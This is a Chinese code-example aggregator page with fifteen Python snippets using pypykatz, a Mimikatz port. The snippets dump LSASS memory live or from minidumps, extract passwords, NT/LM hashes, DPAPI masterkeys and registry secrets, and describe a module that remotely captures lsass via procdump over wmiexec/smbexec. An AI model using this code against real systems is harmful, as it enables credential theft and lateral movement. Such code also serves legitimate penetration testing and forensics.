本文整理汇总了Python中pypykatz.pypykatz.pypykatz.pypykatz方法的典型用法代码示例。如果您正苦于以下问题:Python pypykatz.pypykatz方法的具体用法?Python pypykatz.pypykatz怎么用?Python pypykatz.pypykatz使用的例子?那么恭喜您, 这里精选的方法代码示例或许可以为您提供帮助。您也可以进一步了解该方法所在类pypykatz.pypykatz.pypykatz的用法示例。
在下文中一共展示了pypykatz.pypykatz方法的15个代码示例,这些例子默认根据受欢迎程度排序。您可以为喜欢或者感觉有用的代码点赞,您的评价将有助于系统推荐出更棒的Python代码示例。
示例1: __init__
# 需要导入模块: from pypykatz.pypykatz import pypykatz [as 别名]
# 或者: from pypykatz.pypykatz.pypykatz import pypykatz [as 别名]
def __init__(self, timestamp_override = None, buildnumber = None):
"""
Timestamp override will change the msv_dll_timestamp value.
If None > no change
If 0 > it disables the ANIT_MIMIKATZ structs on certain builds
If 1 > it enforces to use the ANTI_MIMIKATZ structs on certain builds
"""
self.session = None
self.lsass_task = None
self.cc = None
self.task_as = None
self.cur_pos = None
self.modules = {}
self.timestamp_override = timestamp_override
#needed for pypykatz
self.processor_architecture = None
self.BuildNumber = buildnumber
self.msv_dll_timestamp = None #a special place in our hearts.... 示例2: get_prekeys_form_registry_live
# 需要导入模块: from pypykatz.pypykatz import pypykatz [as 别名]
# 或者: from pypykatz.pypykatz.pypykatz import pypykatz [as 别名]
def get_prekeys_form_registry_live(self):
"""
return: touple of two lists, [0] userkeys [1] machinekeys
"""
from pypykatz.registry.live_parser import LiveRegistry
from pypykatz.registry.offline_parser import OffineRegistry
lr = None
try:
lr = LiveRegistry.go_live()
except Exception as e:
logger.debug('[DPAPI] Failed to obtain registry secrets via direct registry reading method')
try:
lr = OffineRegistry.from_live_system()
except Exception as e:
logger.debug('[DPAPI] Failed to obtain registry secrets via filedump method')
if lr is not None:
return self.__get_registry_secrets(lr)
else:
raise Exception('Registry parsing failed!') 示例3: get_prekeys_form_registry_files
# 需要导入模块: from pypykatz.pypykatz import pypykatz [as 别名]
# 或者: from pypykatz.pypykatz.pypykatz import pypykatz [as 别名]
def get_prekeys_form_registry_files(self, system_path, security_path, sam_path = None):
"""
return: touple of two lists, [0] userkeys [1] machinekeys
"""
from pypykatz.registry.offline_parser import OffineRegistry
lr = None
try:
lr = OffineRegistry.from_files(system_path, sam_path = sam_path, security_path = security_path)
except Exception as e:
logger.error('[DPAPI] Failed to obtain registry secrets via direct registry reading method. Reason: %s' %e)
if lr is not None:
return self.__get_registry_secrets(lr)
else:
raise Exception('[DPAPI] Registry parsing failed!') 示例4: run_live
# 需要导入模块: from pypykatz.pypykatz import pypykatz [as 别名]
# 或者: from pypykatz.pypykatz.pypykatz import pypykatz [as 别名]
def run_live(self, args):
files_with_error = []
results = {}
if args.module == 'lsa':
filename = 'live'
try:
mimi = pypykatz.go_live()
results['live'] = mimi
except Exception as e:
files_with_error.append(filename)
if args.halt_on_error == True:
raise e
else:
print('Exception while dumping LSA credentials from memory.')
traceback.print_exc()
pass
self.process_results(results, files_with_error,args) 示例5: save_loot
# 需要导入模块: from pypykatz.pypykatz import pypykatz [as 别名]
# 或者: from pypykatz.pypykatz.pypykatz import pypykatz [as 别名]
def save_loot(file, loot_id, encrypted=False):
"""Process the loot file"""
filename = save_file(file, dir=LOOT_DIR, encrypted=encrypted)
loot_type = get_loot_type(filename)
try:
if loot_type == "DMP":
from pypykatz.pypykatz import pypykatz
mimi = pypykatz.parse_minidump_file(filename)
creds = [json.loads(v.to_json())
for _, v in mimi.logon_sessions.items()]
store_minidump(loot_id, json.dumps(creds), filename)
elif loot_type == "SYSINFO":
add_sysinfo(loot_id, filename)
else: # registry hive
add_hive(loot_id, loot_type, filename)
except ImportError as e:
log.error("You have unmet dependencies, loot could not be processed")
log.exception(e) 示例6: parse
# 需要导入模块: from pypykatz.pypykatz import pypykatz [as 别名]
# 或者: from pypykatz.pypykatz.pypykatz import pypykatz [as 别名]
def parse(self):
pypy_parse = pypykatz.parse_minidump_external(self._dumpfile)
self._dumpfile.close()
ssps = ['msv_creds', 'wdigest_creds', 'ssp_creds', 'livessp_creds', 'kerberos_creds', 'credman_creds', 'tspkg_creds']
for luid in pypy_parse.logon_sessions:
for ssp in ssps:
for cred in getattr(pypy_parse.logon_sessions[luid], ssp, []):
domain = getattr(cred, "domainname", None)
username = getattr(cred, "username", None)
password = getattr(cred, "password", None)
LMHash = getattr(cred, "LMHash", None)
NThash = getattr(cred, "NThash", None)
SHAHash = getattr(cred, "SHAHash", None)
if LMHash is not None:
LMHash = LMHash.hex()
if NThash is not None:
NThash = NThash.hex()
if SHAHash is not None:
SHAHash = SHAHash.hex()
# Remove empty password, machine accounts and buggy entries
if self._raw:
self._credentials.append([ssp, domain, username, password, LMHash, NThash, SHAHash])
elif (not all(v is None or v == '' for v in [password, LMHash, NThash, SHAHash])
and username is not None
and not username.endswith('$')
and not username == ''):
self._credentials.append((ssp, domain, username, password, LMHash, NThash, SHAHash))
return RetCode(ERROR_SUCCESS) 示例7: get_by_pypykatz
# 需要导入模块: from pypykatz.pypykatz import pypykatz [as 别名]
# 或者: from pypykatz.pypykatz.pypykatz import pypykatz [as 别名]
def get_by_pypykatz(self):
try:
mimi = pypykatz.go_live()
except:
return {}
return self._extract_from_dump(mimi, 'pypykatz') 示例8: get_by_procdump
# 需要导入模块: from pypykatz.pypykatz import pypykatz [as 别名]
# 或者: from pypykatz.pypykatz.pypykatz import pypykatz [as 别名]
def get_by_procdump(self):
try:
mimi = pypykatz.parse_minidump_file(self.file_dump)
except:
return {}
return self._extract_from_dump(mimi, 'procdump') 示例9: handle
# 需要导入模块: from pypykatz.pypykatz import pypykatz [as 别名]
# 或者: from pypykatz.pypykatz.pypykatz import pypykatz [as 别名]
def handle(self, soc, addr):
peer_addr = '%s:%s' % addr
mimi = None
transport = SocketTransport(soc)
reader = RemoteReader(transport)
try:
print('[+] Handling client...')
sysinfo = reader.setup()
mimi = pypykatz(reader, sysinfo)
mimi.start()
self.resultQ.put((mimi, peer_addr))
cmd = PYPYCMD()
cmd.cmdtype = PYPYCMDType.END
if self.send_results == True:
data = ""
for luid in mimi.logon_sessions:
data += str(mimi.logon_sessions[luid])
cmd.params.append(data.encode())
transport.send(cmd)
print('[+] Client finished!')
except Exception as e:
traceback.print_exc()
if mimi and len(mimi.logon_sessions) > 0:
self.resultQ.put((mimi, peer_addr))
try:
cmd = PYPYCMD()
cmd.cmdtype = PYPYCMDType.END
transport.send(cmd)
except:
pass
return 示例10: from_memory_file
# 需要导入模块: from pypykatz.pypykatz import pypykatz [as 别名]
# 或者: from pypykatz.pypykatz.pypykatz import pypykatz [as 别名]
def from_memory_file(memory_file, timestamp_override = None, buildnumber = None):
logging.info('Invoking recall on file %s' % memory_file)
rsession = session.Session(
filename = memory_file,
autodetect=['rsds', 'pe', 'windows_kernel_file'],
logger = logging.getLogger('pypykatz'),
autodetect_build_local = 'full',
autodetect_scan_length=10*1024*1024*1024,
profile_path=["https://github.com/google/rekall-profiles/raw/master", "http://profiles.rekall-forensic.com"]
)
return RekallReader.from_session(rsession, timestamp_override, buildnumber) 示例11: __get_registry_secrets
# 需要导入模块: from pypykatz.pypykatz import pypykatz [as 别名]
# 或者: from pypykatz.pypykatz.pypykatz import pypykatz [as 别名]
def __get_registry_secrets(self, lr):
"""
Gets the pre-keys from an already parsed OffineRegistry or LiveRegistry object, populates the userkey/machinekey lists, returns the obtained keys
lr: OffineRegistry or LiveRegistry object
return: touple of two lists, [0] userkeys [1] machinekeys
"""
user = []
machine = []
from pypykatz.registry.security.common import LSASecretDPAPI
if lr.security:
for secret in lr.security.cached_secrets:
if isinstance(secret, LSASecretDPAPI):
logger.debug('[DPAPI] Found DPAPI user key in registry! Key: %s' % secret.user_key)
logger.debug('[DPAPI] Found DPAPI machine key in registry! Key: %s' % secret.machine_key)
self.user_keys.append(secret.user_key)
user.append(secret.user_key)
self.machine_keys.append(secret.machine_key)
machine.append(secret.machine_key)
if lr.sam is not None:
for secret in lr.sam.secrets:
if secret.nt_hash:
sid = '%s-%s' % (lr.sam.machine_sid, secret.rid)
x, key2, key3 = self.get_prekeys_from_password(sid, nt_hash = secret.nt_hash)
logger.debug('[DPAPI] NT hash method. Calculated user key for user %s! Key2: %s Key3: %s' % (sid, key2, key3))
user.append(key2)
user.append(key3)
continue
return user, machine 示例12: get_masterkeys_from_lsass_dump
# 需要导入模块: from pypykatz.pypykatz import pypykatz [as 别名]
# 或者: from pypykatz.pypykatz.pypykatz import pypykatz [as 别名]
def get_masterkeys_from_lsass_dump(self, file_path):
"""
Parses the mindiump of an LSASS process file and extracts the plaintext masterkeys
file_path: path to the mindiump file
return: dictionary of guid->keybytes
"""
from pypykatz.pypykatz import pypykatz
katz = pypykatz.parse_minidump_file(file_path)
for x in katz.logon_sessions:
for dc in katz.logon_sessions[x].dpapi_creds:
logger.debug('[DPAPI] Got masterkey for GUID %s via minidump LSASS method' % dc.key_guid)
self.masterkeys[dc.key_guid] = bytes.fromhex(dc.masterkey)
return self.masterkeys 示例13: __init__
# 需要导入模块: from pypykatz.pypykatz import pypykatz [as 别名]
# 或者: from pypykatz.pypykatz.pypykatz import pypykatz [as 别名]
def __init__(self):
self.name = 'procdump'
self.description = 'Uploads procdump.exe to system, captures lsass.exe, downloads & reads output locally using pypykatz'
self.author = ['@m8r0wn']
self.requires_admin = True
self.exec_methods = ['wmiexec', 'smbexec']
self.args = {} 示例14: verify_remoteFile
# 需要导入模块: from pypykatz.pypykatz import pypykatz [as 别名]
# 或者: from pypykatz.pypykatz.pypykatz import pypykatz [as 别名]
def verify_remoteFile(self, filename):
found = False
for x in self.smb_con.list_path(self.share, self.path + "*"):
try:
dir_file = x.get_longname().decode('UTF-8')
except:
dir_file = x.get_longname()
if dir_file.lower() == filename.lower():
return True
return found
##########################
# pypykatz dump parser
########################## 示例15: parsedump
# 需要导入模块: from pypykatz.pypykatz import pypykatz [as 别名]
# 或者: from pypykatz.pypykatz.pypykatz import pypykatz [as 别名]
def parsedump(self, loggers, smb_con, dumpfile):
# Modified from:
# https://github.com/awsmhacks/CrackMapExtreme/blob/a3a0ca13014b88dd2feb6db2ac522e2573321d6c/cmx/protocols/smb.py
# & Inspiration by @HackAndDo aka Pixis for these parse bits
arg = Namespace(outfile = False,
json = False,
grep = False,
kerberos_dir = False,
recursive = False,
directory = False)
out = pypykatz.parse_minidump_file(dumpfile)
f = io.StringIO()
with redirect_stdout(f): # Hides output
LSACMDHelper().process_results({"dumpfile": out}, [], arg)
logger = loggers['console']
db_updates = 0
for cred in self.parse_output(f.getvalue()):
if cred['Password']:
smb_con.db.update_user(cred['Username'], cred['Password'], cred['Domain'], '')
logger.success([smb_con.host, smb_con.ip, self.name.upper(), "{}\\{}:{}".format(cred['Domain'], cred['Username'], cred['Password'])])
db_updates += 1
elif cred['Hash']:
smb_con.db.update_user(cred['Username'], '', cred['Domain'], cred['Hash'])
logger.success([smb_con.host, smb_con.ip, self.name.upper(), "{}\\{}:{}".format(cred['Domain'], cred['Username'], cred['Hash'])])
db_updates += 1
logger.info([smb_con.host, smb_con.ip, self.name.upper(), "{} credentials updated in database".format(db_updates)])
logger.info([smb_con.host, smb_con.ip, self.name.upper(), "Dmp file saved to: {}".format(self.local_output)])